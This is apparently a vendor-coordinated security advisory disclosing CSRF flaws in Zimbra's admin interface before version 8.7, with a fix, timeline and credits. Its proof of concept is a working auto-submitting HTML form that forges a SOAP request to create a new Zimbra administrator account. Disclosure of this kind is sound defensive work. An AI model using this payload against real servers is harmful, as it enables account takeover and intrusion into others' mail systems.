Description

Multiple CSRF vulnerabilities have been found in the administration interface of Zimbra, giving possibilities like adding, modifying and removing admin accounts.

Zimbra nicely credited our efforts:

Zimbra credits

Vulnerability

Every forms in the Administration part of Zimbra are vulnerable to CSRF because of the lack of a CSRF token identifying a valid session. As a consequence, requests can be forged and played arbitrarily.

Access Vector: remote

Security Risk: low

Vulnerability: CWE-352

CVSS Base score: 5.8

Proof of Concept

<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Solution

  • Upgrade to version 8.7

Affected versions

  • All versions previous to 8.7

Fixes

  • https://bugzilla.zimbra.com/show_bug.cgi?id=100885
  • https://bugzilla.zimbra.com/show_bug.cgi?id=100899

Timeline (dd/mm/yyyy)

  • 24/02/2016: Issue reported to Zimbra
  • 24/02/2016: Issue aknwoledged

Credits

  • Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail -dot- fr)
  • Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)